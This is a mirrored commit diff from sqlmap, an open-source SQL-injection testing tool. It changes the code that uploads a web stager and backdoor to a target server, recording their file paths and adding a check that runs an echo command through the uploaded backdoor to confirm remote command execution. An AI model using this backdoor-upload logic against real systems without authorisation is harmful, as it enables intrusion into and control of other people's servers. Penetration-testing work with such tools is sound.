mirror of
https://github.com/sqlmapproject/sqlmap.git
synced 2024-11-29 21:13:51 +03:00
verify also that the web backdoor has been successfully uploaded
This commit is contained in:
parent
6f6cd676b7
commit
0702dd70b5
|
@ -45,7 +45,9 @@ class Web:
|
||||||
self.webApi = None
|
self.webApi = None
|
||||||
self.webBaseUrl = None
|
self.webBaseUrl = None
|
||||||
self.webBackdoorUrl = None
|
self.webBackdoorUrl = None
|
||||||
|
self.webBackdoorFilePath = None
|
||||||
self.webStagerUrl = None
|
self.webStagerUrl = None
|
||||||
|
self.webStagerFilePath = None
|
||||||
self.webDirectory = None
|
self.webDirectory = None
|
||||||
|
|
||||||
def webBackdoorRunCmd(self, cmd):
|
def webBackdoorRunCmd(self, cmd):
|
||||||
|
@ -215,11 +217,13 @@ class Web:
|
||||||
localPath = directory
|
localPath = directory
|
||||||
uriPath = directory[2:] if isWindowsDriveLetterPath(directory) else directory
|
uriPath = directory[2:] if isWindowsDriveLetterPath(directory) else directory
|
||||||
docRoot = docRoot[2:] if isWindowsDriveLetterPath(docRoot) else docRoot
|
docRoot = docRoot[2:] if isWindowsDriveLetterPath(docRoot) else docRoot
|
||||||
|
|
||||||
if docRoot in uriPath:
|
if docRoot in uriPath:
|
||||||
uriPath = uriPath.replace(docRoot, "/")
|
uriPath = uriPath.replace(docRoot, "/")
|
||||||
uriPath = "/%s" % normalizePath(uriPath)
|
uriPath = "/%s" % normalizePath(uriPath)
|
||||||
else:
|
else:
|
||||||
webDir = extractRegexResult(r"//[^/]+?/(?P<result>.*)/.", conf.url)
|
webDir = extractRegexResult(r"//[^/]+?/(?P<result>.*)/.", conf.url)
|
||||||
|
|
||||||
if webDir:
|
if webDir:
|
||||||
uriPath = "/%s" % webDir
|
uriPath = "/%s" % webDir
|
||||||
else:
|
else:
|
||||||
|
@ -233,6 +237,7 @@ class Web:
|
||||||
|
|
||||||
self.webBaseUrl = "%s://%s:%d%s" % (conf.scheme, conf.hostname, conf.port, uriPath)
|
self.webBaseUrl = "%s://%s:%d%s" % (conf.scheme, conf.hostname, conf.port, uriPath)
|
||||||
self.webStagerUrl = "%s/%s" % (self.webBaseUrl, stagerName)
|
self.webStagerUrl = "%s/%s" % (self.webBaseUrl, stagerName)
|
||||||
|
self.webStagerFilePath = ntToPosixSlashes(normalizePath("%s/%s" % (localPath, stagerName))).replace("//", "/").rstrip('/')
|
||||||
|
|
||||||
uplPage, _, _ = Request.getPage(url=self.webStagerUrl, direct=True, raise404=False)
|
uplPage, _, _ = Request.getPage(url=self.webStagerUrl, direct=True, raise404=False)
|
||||||
|
|
||||||
|
@ -244,6 +249,7 @@ class Web:
|
||||||
warnMsg += "on '%s'" % localPath
|
warnMsg += "on '%s'" % localPath
|
||||||
logger.warn(warnMsg)
|
logger.warn(warnMsg)
|
||||||
warned.add(localPath)
|
warned.add(localPath)
|
||||||
|
|
||||||
continue
|
continue
|
||||||
|
|
||||||
elif "<%" in uplPage or "<?" in uplPage:
|
elif "<%" in uplPage or "<?" in uplPage:
|
||||||
|
@ -306,8 +312,16 @@ class Web:
|
||||||
|
|
||||||
self.webBackdoorUrl = "%s/%s" % (self.webBaseUrl, backdoorName)
|
self.webBackdoorUrl = "%s/%s" % (self.webBaseUrl, backdoorName)
|
||||||
self.webDirectory = localPath
|
self.webDirectory = localPath
|
||||||
|
self.webBackdoorFilePath = ntToPosixSlashes(normalizePath("%s/%s" % (localPath, backdoorName))).replace("//", "/").rstrip('/')
|
||||||
|
|
||||||
|
testStr = "command execution test"
|
||||||
|
output = self.webBackdoorRunCmd("echo %s" % testStr)
|
||||||
|
|
||||||
|
if testStr in output:
|
||||||
|
infoMsg = "the backdoor has been successfully "
|
||||||
|
else:
|
||||||
|
infoMsg = "the backdoor has probably been successfully "
|
||||||
|
|
||||||
infoMsg = "the backdoor has probably been successfully "
|
|
||||||
infoMsg += "uploaded on '%s' - " % self.webDirectory
|
infoMsg += "uploaded on '%s' - " % self.webDirectory
|
||||||
infoMsg += self.webBackdoorUrl
|
infoMsg += self.webBackdoorUrl
|
||||||
logger.info(infoMsg)
|
logger.info(infoMsg)
|
||||||
|
|
Loading…
Reference in New Issue
Block a user